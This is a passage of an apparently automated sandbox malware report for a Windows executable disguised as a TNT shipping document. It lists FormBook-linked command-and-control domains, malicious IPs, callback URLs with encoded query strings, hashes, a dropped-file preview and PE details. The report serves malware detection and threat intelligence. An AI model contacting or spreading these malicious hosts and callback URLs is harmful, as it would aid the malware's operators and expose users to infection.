                                    https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-oexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.slab-leak-repair-74697.bond/jd21/www.tyumk.xyzexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.borghardt.xyz/jd21/www.slab-leak-repair-74697.bondexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.circusenergy.online/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.xmld101.icuReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.borghardt.xyzReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.53.179.92
                                    		www.pools-80761.bondGermany
                                    		61969TEAMINTERNET-ASDEtrue
                                    185.53.179.93
                                    		www.walk-in-tubs-30303.bondGermany
                                    		61969TEAMINTERNET-ASDEtrue
                                    188.114.96.3
                                    		www.weight-loss-003.todayEuropean Union
                                    		13335CLOUDFLARENETUStrue
                                    185.134.245.113
                                    		www.circusenergy.onlineNorway
                                    		12996DOMENESHOPOsloNorwayNOtrue
                                    77.37.37.36
                                    		legendhud.shopGermany
                                    		31400ACCELERATED-ITDEtrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1517909
                                    Start date and time:2024-09-25 09:05:25 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 10m 54s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:12
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:TNT AWB TRACKING DETAILS.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@304/1@12/5
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 57
                                    • Number of non-executed functions: 294
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                    • Report size getting too big, too many NtOpenKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: TNT AWB TRACKING DETAILS.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    03:06:37API Interceptor8410044x Sleep call for process: explorer.exe modified
                                    03:07:10API Interceptor7492145x Sleep call for process: wlanext.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    185.53.179.92COM404 PDF.exeGet hashmaliciousFormBookBrowse
                                    • www.online-gaming-66785.bond/he2a/?9r9Hc=ivWl&NtxTwXO=/hGdMBZyum5W4qtIJyLtA9fBMnlFOJpmlvcb/w4pljM3rKnmSOUNR8RWZTuid8vspaGbtSwNHA==
                                    Orden de compra 0307AR24.exeGet hashmaliciousFormBookBrowse
                                    • www.ux-design-courses-17184.bond/md02/?TPXh=O2vdgLwRhMAgOHoS701s4xS4xJeZ/+uwNgHwz2yOIOwCqMZJzZYnLthi8nNL68HJ3+dRBVTqOQ==&nHLDZb=8p-HvnKhThQhTxm
                                    Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeGet hashmaliciousFormBookBrowse
                                    • www.hemophilia-treatment-41433.bond/pz12/?Ft6LPF=I28W/3a7leZLTJTVQ6pLzOFASFQBM/RHJVT607x5WCzJ2jZGT2NOi6Mb2MIHH5pYEuLB&Ev2=OjrLPv0Hh4WLu
                                    PO_0049_&_0050.xlsGet hashmaliciousFormBookBrowse
                                    • www.family-doctor-30030.com/my28/?h2Jdv=79IGywBWJhGw8mHY4Ed55Qbw0iEgtBEh+S8JDPa/nYZjsEVgaC4IJbnYN4OFlpxaLyr5Lg==&9rQ=c48da8_XbVvlJH8
                                    E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • www.cruises-62138.bond/my26/?l4DHGh=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&p41P=mVDhw
                                    Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • www.cruises-62138.bond/my26/?FD=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&8psPYP=k4Hh
                                    E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • www.cruises-62138.bond/my26/?f8HLWH=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&0T=Z87P2TP
                                    Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • www.cruises-62138.bond/my26/?k4p=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&ijc=1bxDp
                                    Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • www.cruises-62138.bond/my26/?q4=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&5jdh=DPxH-Ti82
                                    E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • www.cruises-62138.bond/my26/?_fvPp=DhxFqfI9N7ytGMr7+SOPlgLH0+mxXzpNvffODTnmnzF1LX8PasEKVGrRTADD59/oI3Me&6lo8sx=KtF83LWPF
                                    185.53.179.93DPPLYAD_12872 PDF.exeGet hashmaliciousFormBookBrowse
                                    • www.influencer-marketing-47216.bond/he2a/?nN=Sxl0i64hVtElz&CPG=84/fs4NIs15aEXqKDdXxWbs8wsGB+NHFSJU+jeYjKKNMPhGfzDAaf2frC9w/jls3PXKW
                                    DHL SHIPPING DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                    • www.stress-relief-44110.bond/jd21/?ob4t_tGP=WFlpkkyn+BDxDNVRAZhlfyliDB7yOKGW8w90QluphSZSwYX7XSmCpSriaZ6fRHTWFXuNNuNFMw==&BnS=gdiT6Fgho0hl
                                    DHL SHIPPING DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                    • www.stress-relief-44110.bond/jd21/?lH0=WFlpkkyn+BDxDNVRAZhlfyliDB7yOKGW8w90QluphSZSwYX7XSmCpSriaZ2mdm/WSRyc&lf28=I2MdzbjH5B0P
                                    DHL_TOC2_2407081728458457.pdf.exeGet hashmaliciousFormBookBrowse
                                    • www.cameras-30514.bond/rn94/?vB=lf5P&Txo=lgoizE4pNYtxCOmOxzD8L5p+lA3qLSKEOo6jBStnDh5AReX7kYuYzSwx+/h0WveL3C1X
                                    4LPk0o7T6C.exeGet hashmaliciousFormBookBrowse
                                    • www.cameras-30514.bond/rn94/?CZbDp=fTeDovxhSZ2T70J&2ds=lgoizE4pNYtxCOmOxzD8L5p+lA3qLSKEOo6jBStnDh5AReX7kYuYzSwx+/h0WveL3C1X
                                    DHL AWB DOCUMENT.pdf.exeGet hashmaliciousFormBookBrowse
                                    • www.cameras-30514.bond/rn94/?1bY=lgoizE4pNYtxCOmOxzD8L5p+lA3qLSKEOo6jBStnDh5AReX7kYuYzSwx+8BrdPOztlId&Ejf=3fSHwbBPFx2LVVzP
                                    LrhyzIl40E4GDdy.exeGet hashmaliciousFormBookBrowse
                                    • www.furniture-70925.bond/cr12/?Et08lJ=XDKPfBipy&J48=Z2oUF1m4elERiz7Ex45taoW4BZHJdwPpAy0MxX0cF9HtIbM34bdf89HCNVI2e3JPTorjxusTzw==
                                    PO TRO-1075 - TRO-1076 904504608468.pdf.exeGet hashmaliciousFormBookBrowse
                                    • www.cameras-30514.bond/rn94/?UTF4x=lgoizE4pNYtxCOmOxzD8L5p+lA3qLSKEOo6jBStnDh5AReX7kYuYzSwx+/h0WveL3C1X&WXr=jDKXzfrpmlKTeV
                                    EKSTRE_06.08.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • www.fashion-clothing-40094.com/a04y/?lR-4=kf2pTR4VeO7lT7Z2mQjWW9EM/kzbt5pVVhNCWcIafITiEZY5EVN/5vtXeaVLQc5XGXSQ&Hr=k2JdV
                                    RFQ_39250100.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • www.internet-providers-45067.com/o17i/

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    www.pools-80761.bondDHL SHIPPING DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                    • 185.53.179.92
                                    www.weight-loss-003.todayDHL SHIPPING DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                    • 188.114.97.3
                                    DHL SHIPPING DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                    • 188.114.97.3
                                    www.circusenergy.onlineDHL SHIPPING DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                    • 185.134.245.113

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUSNEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                                    • 104.26.12.205
                                    Document.xlsGet hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    Payment_Advise.exeGet hashmaliciousGuLoaderBrowse
                                    • 172.67.146.197
                                    Document.xlsGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    New_Document-0706282.jsGet hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                    • 188.114.96.3
                                    https://download.devscope.net/setups/PowerBITiles/PowerBITilesDesktopPowerPoint.zipGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    New_Document-0706282.jsGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 188.114.96.3
                                    DOMENESHOPOsloNorwayNOGestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                    • 185.134.245.113
                                    FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                    • 185.134.245.113
                                    New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                    • 185.134.245.113
                                    Scan 00093847.exeGet hashmaliciousFormBookBrowse
                                    • 185.134.245.113
                                    REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 185.134.245.113
                                    PO TIYEY078K.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                    • 185.134.245.114
                                    PO AFHOR9301604.exeGet hashmaliciousFormBookBrowse
                                    • 185.134.245.113
                                    DHL SHIPPING DOCUMENT.exeGet hashmaliciousFormBookBrowse
                                    • 185.134.245.113
                                    Quote - V-24-TOS-082.exeGet hashmaliciousFormBookBrowse
                                    • 185.134.245.113
                                    aaL1b0cQ49.exeGet hashmaliciousFormBookBrowse
                                    • 194.63.248.52
                                    TEAMINTERNET-ASDEORDER_1105-19-24-3537.pdf.exeGet hashmaliciousFormBookBrowse
                                    • 185.53.179.90
                                    ActSet.ps1Get hashmaliciousFredy StealerBrowse
                                    • 185.53.177.31
                                    ActSet.ps1Get hashmaliciousFredy StealerBrowse
                                    • 185.53.177.31
                                    SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                    • 185.53.178.50
                                    t5ueYgHiHnIdeNe.exeGet hashmaliciousFormBookBrowse
                                    • 185.53.179.90
                                    IDMan.exeGet hashmaliciousFredy StealerBrowse
                                    • 185.53.177.31
                                    IDMan.exeGet hashmaliciousFredy StealerBrowse
                                    • 185.53.177.31
                                    firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                    • 185.53.178.51
                                    firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                    • 185.53.178.51
                                    firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                    • 185.53.177.50
                                    TEAMINTERNET-ASDEORDER_1105-19-24-3537.pdf.exeGet hashmaliciousFormBookBrowse
                                    • 185.53.179.90
                                    ActSet.ps1Get hashmaliciousFredy StealerBrowse
                                    • 185.53.177.31
                                    ActSet.ps1Get hashmaliciousFredy StealerBrowse
                                    • 185.53.177.31
                                    SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                    • 185.53.178.50
                                    t5ueYgHiHnIdeNe.exeGet hashmaliciousFormBookBrowse
                                    • 185.53.179.90
                                    IDMan.exeGet hashmaliciousFredy StealerBrowse
                                    • 185.53.177.31
                                    IDMan.exeGet hashmaliciousFredy StealerBrowse
                                    • 185.53.177.31
                                    firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                    • 185.53.178.51
                                    firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                    • 185.53.178.51
                                    firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                    • 185.53.177.50

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Temp\antholite

                                    Download File
                                    Process:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):189952
                                    Entropy (8bit):7.879300915522741
                                    Encrypted:false
                                    SSDEEP:3072:uW2JW+t2LnMm6kB5E3ltiszb1Kja0m95kJLjHqtugIZl8FqWFZotS9JCy/:YwLMn3visIpmeJXnP840PJD/
                                    MD5:984F9F33FD5214D019BED7AB61E51BD7
                                    SHA1:B82C31CA900C78600041CDF8BF9370668A655FE2
                                    SHA-256:406475333C6BD86F84264D0DC0A90EF8A0F7FF299FBC0D2D74089C4A759F7823
                                    SHA-512:72B2E1DD7FD011B10B0B63D3AC552F32A828355BF71BD6226600812BFE2751552CAE008B30C40A73F53FA3493899CDEB5D6194EB55C455598F63902BD6CDA0D2
                                    Malicious:false
                                    Reputation:low
                                    Preview:...j.4AU2..N...k.66...IZ..BM8B4AU2TOSGKDHHWU65WWEWJR1YUB.8B4OJ.ZO.N.e.I...a?>6w: ^>'# .!U/;] o1"k6=&w<X....w'=U<{O@2f4AU2TOS4Zq..'...'..`:...S..I2o..4..g7...N...E...>):.)..M8B4AU2T..GK.IIWCv..WEWJR1YU.M:C?@_2T.QGKDHHWU65..DWJB1YU.O8B4.U2DOSGIDHMWT65WWERJS1YUBM8.6AU0TOSGKDJH..65GWEGJR1YEBM(B4AU2T_SGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJ|E<-6M8B0.W2T_SGK.JHWE65WWEWJR1YUBM8b4A52TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGKDHHWU65WWEWJR1YUBM8B4AU2TOSGK

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.3898567700817095
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:TNT AWB TRACKING DETAILS.exe
                                    File size:1'135'963 bytes
                                    MD5:b49edb762958e81c098b4869ba26a78c
                                    SHA1:152bda24aa1bd2b8f6eff91f214ebf1701062a7e
                                    SHA256:58892474694c1aff444adca37753e52b93fffce8bb98b75d488ec3df2c87b2da
                                    SHA512:305621b6ded9f58155036348d65f6d01891b99f9d4d5c480a973419d597a8b1e95ed33a60641df0e3025eb3e97042d73f4d2362ef70e1554bdfabcdd592e8175
                                    SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCfdG8gHowXUy4b59IRGEP4gnV:7JZoQrbTFZY1iaCFGdUyC9IRGEP44
                                    TLSH:AF35E121F5D68036C1B323B19E7FF76A963D69360336D19727C82E321EA05416B2A773
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                    File Icon

                                    Icon Hash:1733312925935517

                                    Static PE Info

                                    General

                                    Entrypoint:0x4165c1
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                    Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                    Entrypoint Preview

                                    Instruction
                                    call 00007FD8F94CC02Bh
                                    jmp 00007FD8F94C2E9Eh
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    push edi
                                    push esi
                                    mov esi, dword ptr [ebp+0Ch]
                                    mov ecx, dword ptr [ebp+10h]
                                    mov edi, dword ptr [ebp+08h]
                                    mov eax, ecx
                                    mov edx, ecx
                                    add eax, esi
                                    cmp edi, esi
                                    jbe 00007FD8F94C301Ah
                                    cmp edi, eax
                                    jc 00007FD8F94C31B6h
                                    cmp ecx, 00000080h
                                    jc 00007FD8F94C302Eh
                                    cmp dword ptr [004A9724h], 00000000h
                                    je 00007FD8F94C3025h
                                    push edi
                                    push esi
                                    and edi, 0Fh
                                    and esi, 0Fh
                                    cmp edi, esi
                                    pop esi
                                    pop edi
                                    jne 00007FD8F94C3017h
                                    jmp 00007FD8F94C33F2h
                                    test edi, 00000003h
                                    jne 00007FD8F94C3026h
                                    shr ecx, 02h
                                    and edx, 03h
                                    cmp ecx, 08h
                                    jc 00007FD8F94C303Bh
                                    rep movsd
                                    jmp dword ptr [00416740h+edx*4]
                                    mov eax, edi
                                    mov edx, 00000003h
                                    sub ecx, 04h
                                    jc 00007FD8F94C301Eh
                                    and eax, 03h
                                    add ecx, eax
                                    jmp dword ptr [00416654h+eax*4]
                                    jmp dword ptr [00416750h+ecx*4]
                                    nop
                                    jmp dword ptr [004166D4h+ecx*4]
                                    nop
                                    inc cx
                                    add byte ptr [eax-4BFFBE9Ah], dl
                                    inc cx
                                    add byte ptr [ebx], ah
                                    ror dword ptr [edx-75F877FAh], 1
                                    inc esi
                                    add dword ptr [eax+468A0147h], ecx
                                    add al, cl
                                    jmp 00007FD8FB93B817h
                                    add esi, 03h
                                    add edi, 03h
                                    cmp ecx, 08h
                                    jc 00007FD8F94C2FDEh
                                    rep movsd
                                    jmp dword ptr [00000000h+edx*4]

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2010 SP1 build 40219
                                    • [C++] VS2010 SP1 build 40219
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ASM] VS2010 SP1 build 40219
                                    • [RES] VS2010 SP1 build 40219
                                    • [LNK] VS2010 SP1 build 40219

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                    RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                    RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                    RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                    RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                    RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                    RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                    RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                    RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                    RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                    RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                    RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                    RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                    RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                    RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                    RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                    RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                    RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                    RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                    RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                    RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                    RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                    RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                    RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                    RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                    RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                    RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                    Imports

                                    DLLImport
